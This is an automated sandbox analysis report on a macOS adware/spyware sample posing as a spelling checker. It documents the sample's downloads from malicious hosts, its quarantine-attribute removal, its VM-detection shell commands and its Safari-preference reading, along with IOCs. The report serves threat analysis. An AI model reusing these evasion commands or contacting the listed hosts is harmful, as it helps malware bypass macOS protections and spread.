Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report iWk7svKGhJ

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:61433
Start date:03.10.2018
Start time:14:11:09
Joe Sandbox Product:Cloud
Overall analysis duration:0h 5m 31s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:iWk7svKGhJ (renamed file extension from none to app)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal72.adwa.spyw.evad.macAPP@0/8@2/0

Detection

StrategyScoreRangeReportingDetection
Threshold720 - 100Report FP / FNmalicious

Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample will exhibit less behavior



Signature Overview

Click to jump to signature section


Networking:

barindex
Downloads compressed data via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 03 Oct 2018 12:12:21 GMTContent-Type: application/zipContent-Length: 53113Last-Modified: Tue, 25 Sep 2018 17:08:06 GMTConnection: keep-aliveETag: "5baa6b76-cf79"Accept-Ranges: bytesData Raw: 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 14 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 23 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 53 69 67 6e 61 74 75 72 65 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 af 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 30 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /hello.txt HTTP/1.1Host: vision-set.downloadAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /hello.txt HTTP/1.1Host: vision-set.downloadAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /readautoip.php?prefix=upd: HTTP/1.1Host: rs64nrl.infoAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /files/cmdse.txt HTTP/1.1Host: vision-set.downloadAccept: */*Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /files/Search.zip HTTP/1.1Host: vision-set.downloadAccept: */*Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: vision-set.download
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /api/event/ping.php HTTP/1.1Host: vision-set.downloadContent-Type: text/plainConnection: keep-aliveX-Sig: 9d367d4a3ad24b5a591135355f3e9c86Accept: */*Accept-Language: en-usContent-Length: 664Accept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Tries to download non-existing http data (HTTP/1.1 404 Not Found)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.9.15Date: Wed, 03 Oct 2018 12:12:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveAccess-Control-Allow-Origin: *Content-Encoding: gzipData Raw: 32 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 4e ad 54 c8 cb 2f 51 48 cb 2f cd 4b 51 04 00 c6 30 55 ce 0e 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 22NT/QH/KQ0U0

Spam, unwanted Advertisements and Ransom Demands:

barindex
Reads the preferences of SafariShow sources
Source: /bin/sh (PID: 725)Defaults executable reading com.apple.Safari Preferences: /usr/bin/defaultsJump to behavior

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal72.adwa.spyw.evad.macAPP@0/8@2/0

Data Obfuscation:

barindex
Imports the IOKit library (often used to register services)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Persistence and Installation Behavior:

barindex
Changes permissions of written Mach-O filesShow sources
Source: /usr/bin/unzip (PID: 718)Permissions modified for written 64-bit Mach-O /private/tmp/Search.app/Contents/MacOS/Search: bits: - usr: rx grp: rx all: rwxJump to dropped file
Creates application bundlesShow sources
Source: /usr/bin/unzip (PID: 718)Bundle Info.plist file created: Search.app/Contents/Info.plistJump to behavior
Creates code signed application bundlesShow sources
Source: /usr/bin/unzip (PID: 718)Bundle code signature resource file created: Search.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Hidden file created: /tmp/.dat.nosync02c6.3NY2tsJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Shell command executed: /bin/sh -c ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -lJump to behavior
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Shell command executed: /bin/sh -c cd /tmp/ /usr/bin/unzip -o /tmp/ot4860.zipJump to behavior
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Shell command executed: /bin/sh -c /bin/sh -c 'defaults read com.apple.Safari \'NSWindow Frame Preferences\' > /tmp/b.txt ' &Jump to behavior
Source: /bin/sh (PID: 724)Shell command executed: /bin/sh -c defaults read com.apple.Safari 'NSWindow Frame Preferences' > /tmp/b.txtJump to behavior
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/sh (PID: 713)Grep executable: /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior
Opens applications that may be created onesShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Application opened: /usr/bin/open /tmp/Search.appJump to behavior
Reads launchservices plist filesShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/open (PID: 721)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Reads, modifies and/or removes extended attributes containing macOS specific file meta dataShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Xattr command executed: /usr/bin/xattr -d -r com.apple.quarantine /tmp/ot4860.zipJump to behavior
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/unzip (PID: 718)File written: /private/tmp/Search.app/Contents/MacOS/SearchJump to dropped file
Writes Mach-O files to the tmp directoryShow sources
Source: /usr/bin/unzip (PID: 718)64-bit Mach-O written to tmp path: /private/tmp/Search.app/Contents/MacOS/SearchJump to dropped file
Writes ZIP files to diskShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)ZIP file created: /private/tmp/.dat.nosync02c6.3NY2tsJump to dropped file
App bundle is code signedShow sources
Source: Submitted file: iWk7svKGhJ.appCodeResources XML file: CodeResources
Source: Submitted file: iWk7svKGhJ.appCodeResources XML file: CodeResources
Source: Submitted file: .dat.nosync02c6.3NY2ts.266.drCodeResources XML file: CodeResources
Source: Submitted file: .dat.nosync02c6.3NY2ts.266.drCodeResources XML file: CodeResources
Reads data from the local random generatorShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)Random device file read: /dev/urandomJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Uses the Python frameworkShow sources
Source: /usr/bin/xattr (PID: 715)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/xattr (PID: 716)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/xattr (PID: 719)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/xattr (PID: 720)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /usr/bin/unzip (PID: 718)XML plist file created: /private/tmp/Search.app/Contents/_CodeSignature/CodeResourcesJump to dropped file
Source: /usr/bin/unzip (PID: 718)Binary plist file created: /private/tmp/Search.app/Contents/Resources/Base.lproj/MainMenu.nibJump to dropped file
Source: /usr/bin/unzip (PID: 718)XML plist file created: /private/tmp/Search.app/Contents/Info.plistJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Removes the kMDItemWhereFroms bit to disguise the files origin (typically to hide the source URL if downloaded)Show sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Xattr command executed: /usr/bin/xattr -d -r com.apple.metadata:kMDItemWhereFroms /tmp/ot4860.zipJump to behavior

Malware Analysis System Evasion:

barindex
Searches for VM related strings in files or piped streams (probably for evasion)Show sources
Source: /bin/sh (PID: 713)Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior
Source: /bin/sh (PID: 713)Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior
Source: /bin/sh (PID: 713)Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior
Source: /bin/sh (PID: 713)Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Removes the quarantine attribute (used to protect from malware) from filesShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Xattr command executed: /usr/bin/xattr -d -r com.apple.quarantine /tmp/ot4860.zipJump to behavior
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Sysctl read request: kern.safeboot (1.66)Jump to behavior

Language, Device and Operating System Detection:

barindex
Executes the "ioreg" command used to gather hardware information (I/O kit registry)Show sources
Source: /bin/sh (PID: 712)IOreg executable: /usr/sbin/ioreg -> ioreg -lJump to behavior
Reads hardware related sysctl valuesShow sources
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Reads the systems OS release and/or typeShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Reads the systems hostnameShow sources
Source: /bin/sh (PID: 711)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 717)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 723)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 724)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/open (PID: 721)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Executes the "defaults" command used to read or modify user specific settingsShow sources
Source: /bin/sh (PID: 725)Defaults executable: /usr/bin/defaults -> defaults read com.apple.Safari NSWindow Frame PreferencesJump to behavior


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 61433 Sample: iWk7svKGhJ Startdate: 03/10/2018 Architecture: MAC Score: 72 40 rs64nrl.info 163.172.60.125, 49237, 80 AS12876FR United Kingdom 2->40 42 vision-set.download 195.154.31.197, 49235, 49236, 49238 AS12876FR France 2->42 8 xpcproxy SpellingChecker 1 2->8         started        11 xpcproxy Search 2->11         started        process3 signatures4 52 Removes the kMDItemWhereFroms bit to disguise the files origin (typically to hide the source URL if downloaded) 8->52 54 Removes the quarantine attribute (used to protect from malware) from files 8->54 13 sh 8->13         started        15 sh 8->15         started        17 xattr Python 8->17         started        21 4 other processes 8->21 19 sh 11->19         started        process5 process6 23 sh ioreg 13->23         started        26 sh grep 13->26         started        28 sh wc 13->28         started        30 sh unzip 5 15->30         started        33 sh sh 19->33         started        file7 48 Executes the "ioreg" command used to gather hardware information (I/O kit registry) 23->48 50 Searches for VM related strings in files or piped streams (probably for evasion) 26->50 38 /private/tmp/Searc...ntents/MacOS/Search, Mach-O 30->38 dropped 35 sh defaults 1 33->35         started        signatures8 process9 signatures10 44 Reads the preferences of Safari 35->44 46 Executes the "defaults" command used to read or modify user specific settings 35->46

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

cam-macmac-stand

Startup

  • system is mac1
  • xpcproxy (PID: 710 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • SpellingChecker (PID: 710 PPID: 1 Overlayed Process Image: xpcproxy MD5: 0194c31984d1501bf9835c0d4d48cbbf)
    • sh (PID: 711 PPID: 710 MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 712 PPID: 711 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ioreg (PID: 712 PPID: 711 Overlayed Process Image: sh MD5: c728ee7d6c0e4941de5ab855a856f473)
      • sh (PID: 713 PPID: 711 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 713 PPID: 711 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 714 PPID: 711 MD5: 8aa60b22a5d30418a002b340989384dc)
      • wc (PID: 714 PPID: 711 Overlayed Process Image: sh MD5: b89949ce6a1929257e5c0c157027cbfe)
    • xattr (PID: 715 PPID: 710 MD5: e2ca6555fe4b8c6a97d1ced2156c9b69)
    • Python (PID: 715 PPID: 710 Overlayed Process Image: xattr MD5: ba780ab677147d9db60c564ef3f51dd0)
    • xattr (PID: 716 PPID: 710 MD5: e2ca6555fe4b8c6a97d1ced2156c9b69)
    • Python (PID: 716 PPID: 710 Overlayed Process Image: xattr MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 717 PPID: 710 MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 718 PPID: 717 MD5: 8aa60b22a5d30418a002b340989384dc)
      • unzip (PID: 718 PPID: 717 Overlayed Process Image: sh MD5: f598378ec162f3480d71dc44cc07243c)
    • xattr (PID: 719 PPID: 710 MD5: e2ca6555fe4b8c6a97d1ced2156c9b69)
    • Python (PID: 719 PPID: 710 Overlayed Process Image: xattr MD5: ba780ab677147d9db60c564ef3f51dd0)
    • xattr (PID: 720 PPID: 710 MD5: e2ca6555fe4b8c6a97d1ced2156c9b69)
    • Python (PID: 720 PPID: 710 Overlayed Process Image: xattr MD5: ba780ab677147d9db60c564ef3f51dd0)
    • open (PID: 721 PPID: 710 MD5: 40ed6d8f35c9f20484b97582d296398f)
  • xpcproxy (PID: 722 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • Search (PID: 722 PPID: 1 Overlayed Process Image: xpcproxy MD5: 964bacf4c598811008b7b6379945eb8a)
    • sh (PID: 723 PPID: 722 MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 724 PPID: 723 MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 724 PPID: 723 Overlayed Process Image: sh MD5: 8aa60b22a5d30418a002b340989384dc)
        • sh (PID: 725 PPID: 724 MD5: 8aa60b22a5d30418a002b340989384dc)
        • defaults (PID: 725 PPID: 724 Overlayed Process Image: sh MD5: 831678c94c2d9c647bf3d283b1861bda)
  • cleanup

Created / dropped Files

/dev/null
Process:/private/tmp/Search.app/Contents/MacOS/Search
File Type:ASCII text
Size (bytes):181
Entropy (8bit):5.116840263214813
Encrypted:false
MD5:E67BFD571368561F246E4AB021FB48D0
SHA1:2CDC676735E83E04FA6C80DE4B971136AAFEE52E
SHA-256:706CDDB4EDD286C429728A63A6C25455571BD49376BBAD64D19102014B3FCEDA
SHA-512:769026A74344BD45BD06397247C6AD5FD00C30A06D2C1368601DCA8A71232AB6D91CDDE9C60880D6DD647C775FE21634015E78A829F008A6342EF356B4CA5DC8
Malicious:false
Reputation:low
/private/tmp/.dat.nosync02c6.3NY2ts
Process:/Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker
File Type:Zip archive data, at least v1.0 to extract
Size (bytes):53113
Entropy (8bit):7.982567069854612
Encrypted:false
MD5:571DC46877EE9B1EE1A169B479018897
SHA1:2C2ECFB454A555432F4E126C9048836ED3EA0CF0
SHA-256:641773F7DBF383798BD4A1E2CA9E4949A975CE71F8BCCDE023B3921CF6158231
SHA-512:AF29F31CE1AC8900BC6D34803FBF4B2BDD726864EE3E91606CD53972137DABDC47E9E7283FD17D333FB6808F6162F2703037006800C9570BCAAFDBA75403C1C4
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/Info.plist
Process:/usr/bin/unzip
File Type:XML document text
Size (bytes):1545
Entropy (8bit):5.159619643004488
Encrypted:false
MD5:EFAFFBB1150117157339CD7ED4B690BF
SHA1:12781F8207EF88D2648AF32462D6CAD6E07CFEEE
SHA-256:F9565F92C0FDC883F2B9B1011F18CA7BC4ACC0DF8F380DA49749A604C7BD9714
SHA-512:7D55F375B2E0DFD88A251C8181B41A2B77F10BAD311282EFEE272D6CC5FE2E3B3C1FE9AB7DAA4E7B1ECA72D05FEDCF5B58CCD435730E668583932ED35F015290
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/MacOS/Search
Process:/usr/bin/unzip
File Type:Mach-O 64-bit executable
Size (bytes):70384
Entropy (8bit):5.2940628185687935
Encrypted:false
MD5:964BACF4C598811008B7B6379945EB8A
SHA1:158F6997464FAC2D28D5E096B00A893B8EF75E37
SHA-256:43FF15F25E382016BCCE277D3DBC3C9726EE8DFDC590593E381C795BCFEBABD4
SHA-512:F44D722A67F83B78E1F8EB74B2F37CDA3B80929BB74B27F769900ADD49BE50795C7FFBB09FF6C8344B5CFEF98B2E2DCF23A58394B029D869AF854D8ABA4BCBF1
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/PkgInfo
Process:/usr/bin/unzip
File Type:ASCII text, with no line terminators
Size (bytes):8
Entropy (8bit):1.75
Encrypted:false
MD5:23B7D7D024ABB0F558420E098800BF27
SHA1:9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/Resources/Base.lproj/MainMenu.nib
Process:/usr/bin/unzip
File Type:Apple binary property list
Size (bytes):43264
Entropy (8bit):7.045244400186084
Encrypted:false
MD5:0AEAC8F960CB18C95837C527B5ADF442
SHA1:36F94D29CB8B9BE5A3628EF83B2B8EDB9D25F723
SHA-256:7056CF58EC39D1C0F4B5D011C273490F72C88AF940F19F0EF3665D60BE0D92DA
SHA-512:28A9B19F29D05604FE3F586DFF116CA42BA230BAE27DA022522774EBB71F500543F25BE6A609AC0D699A3A265EC8EEBA5C4CCBB250DAF5D51A9FC002C312062A
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/_CodeSignature/CodeResources
Process:/usr/bin/unzip
File Type:XML document text
Size (bytes):2468
Entropy (8bit):4.905198116363016
Encrypted:false
MD5:6FF270AB1711BE733D4183A3A37C2008
SHA1:8621991927CB675E5B99A9DAF79074E03E1C4948
SHA-256:CD8F2C2B948010489BD50E6294A3B6D73B01CDB106499D103EA6CEEA82274179
SHA-512:A94B8859EF4661366BC588E2982007FCC961140BBBF4E53F1F9120CA6E3EEDFDB842E1424B092A4631FCC70DA44ADBCB4F0616C630B765339948A21DDDE4FEEE
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
vision-set.download195.154.31.197truefalseunknown
rs64nrl.info163.172.60.125truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://vision-set.download/api/event/log.phpfalse
    		unknown
    http://vision-set.download/files/cmdse.txtfalse
      		unknown
      http://rs64nrl.info/readautoip.php?prefix=upd:false
        		unknown
        http://vision-set.download/hello.txtfalse
          		unknown
          http://vision-set.download/api/event/ping.phpfalse
            		unknown
            http://vision-set.download/files/Search.zipfalse
              		unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPCountryFlagASNASN NameMalicious
              195.154.31.197France
              		12876AS12876FRfalse
              163.172.60.125United Kingdom
              		12876AS12876FRfalse

              Static File Info

              General

              File type:Zip archive data, at least v1.0 to extract
              Entropy (8bit):7.991438112092073
              TrID:
              • Mac OS X Application Bundle (12004/1) 74.95%
              • ZIP compressed archive (4004/1) 25.00%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
              File name:iWk7svKGhJ.app
              File size:88882
              MD5:784a95029a730ccbbf1efac72d7264d6
              SHA1:f63a8de8645bb9ea1f053711be0808fd639179bd
              SHA256:4eaa4caea4ac543516ffc9954a901e8b8e8c623fcce48304ea74d7a74218683b
              SHA512:93ee9acf67fdbdaadc1e14ba4d801660c2065bbf139b6328f84a6d2f6684aa9912a9ee0881ba1d724b88966057fc5817fab8d324dc5168b61b3626ec484fbe52
              File Content Preview:PK........L.[L................SpellingChecker.app/UX.....[...Z.>..PK........L.[L................SpellingChecker.app/Contents/UX.....[...Z.>..PK........L.[L............,...SpellingChecker.app/Contents/_CodeSignature/UX.....[...Z.>..PK........V.[L..........

              Static App Info

              General Informations

              Package Info:
